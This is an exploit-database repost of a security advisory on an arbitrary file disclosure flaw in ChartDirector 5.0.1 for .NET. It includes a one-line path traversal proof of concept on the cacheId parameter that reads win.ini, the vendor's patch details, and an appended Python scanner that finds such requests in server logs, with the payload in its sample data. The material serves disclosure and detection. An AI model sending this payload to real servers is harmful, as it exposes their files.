0day.today - Biggest Exploit Database in the World.
ChartDirector 5.0.1 (cacheId) Arbitrary File Disclosure Vulnerability
=====================================================================
ChartDirector 5.0.1 (cacheId) Arbitrary File Disclosure Vulnerability
=====================================================================

====================================================
Advisory No.: ISNSC-0910
=============
ChartDirector Critical File Access Information
======
Author: DokFLeed
Program Affected: http://www.chartdir.com for .NET
Version: 5.0.1
Severity: Critical.
Type of Advisory: Mid Disclosure.
Affected/Tested Versions: Random

Program Description
==================
Widely used Chart Component on Financial & Stock Trading websites

Overview
=========
The query variable "cacheId=" is not sanitized, which can allow download of critical files.

Proof Of Concept
================
?ChartDirectorChartImage=chart_WebChartViewer1&cacheId=/../../../../../../../../windows/win.ini

Solution/Fix
============
Upgrade to the latest ChartDirector or apply the following patch (ChartDirector for .NET Ver 5.0.1 Patch 2):
http://www.advsofteng.com/netchartdir501p2.zip

Vendor Status
============
The problem you mention affects ChartDirector for .NET. The current version of ChartDirector for .NET on our web site (Ver 5.0.2) already has this issue fixed. So this issue no longer occurs with the current version of ChartDirector for .NET.

For people using earlier versions of ChartDirector, it is suggested they upgrade to the latest version. They may also apply the following patch (ChartDirector for .NET Ver 5.0.1 Patch 2):
http://www.advsofteng.com/netchartdir501p2.zip

# 0day.today [2024-09-28] #
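
Added example (not part of the advisory and not vendor code): a log check for sites that ran an unpatched 5.0.1, flagging requests whose cacheId value contains path syntax, including percent-encoded forms. The log lines, the /chart.aspx path, the client addresses and the PATH_TOKENS rule are constructed assumptions; only the parameter names and the proof-of-concept value come from the advisory.

```python
from urllib.parse import parse_qsl, unquote

# Constructed W3C-style IIS log lines (not from the advisory). The second
# request carries the cacheId value from the proof of concept above, the
# third a shortened form of it, double percent-encoded.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2000-01-01 10:00:01 GET /chart.aspx ChartDirectorChartImage=chart_WebChartViewer1&cacheId=3f2a9c1e 192.0.2.10 200
2000-01-01 10:00:07 GET /chart.aspx ChartDirectorChartImage=chart_WebChartViewer1&cacheId=/../../../../../../../../windows/win.ini 192.0.2.77 200
2000-01-01 10:00:09 GET /chart.aspx ChartDirectorChartImage=chart_WebChartViewer1&CacheID=%252F..%252F..%252Fwindows%252Fwin.ini 192.0.2.77 200
"""

# Assumption: a legitimate cacheId never needs these path-significant tokens.
PATH_TOKENS = ("..", "/", "\\", ":")


def fully_decode(value, max_rounds=3):
    """Percent-decode until stable so double-encoded separators are exposed."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def path_like_cache_id(query):
    """Return the decoded cacheId if it contains path syntax, else None."""
    for key, value in parse_qsl(query, keep_blank_values=True):
        if key.lower() == "cacheid":  # ASP.NET QueryString lookup ignores case
            value = fully_decode(value)  # parse_qsl already decoded one layer
            if any(tok in value for tok in PATH_TOKENS):
                return value
    return None


def scan(log_text):
    """Return (client_ip, status, decoded_cacheId) for each flagged request."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column order is declared by the log
        elif line and not line.startswith("#") and fields:
            row = dict(zip(fields, line.split()))
            bad = path_like_cache_id(row.get("cs-uri-query", ""))
            if bad is not None:
                hits.append((row["c-ip"], row["sc-status"], bad))
    return hits
```

A flagged request that returned status 200 on a pre-patch server is the case to follow up, since the response may have contained the named file.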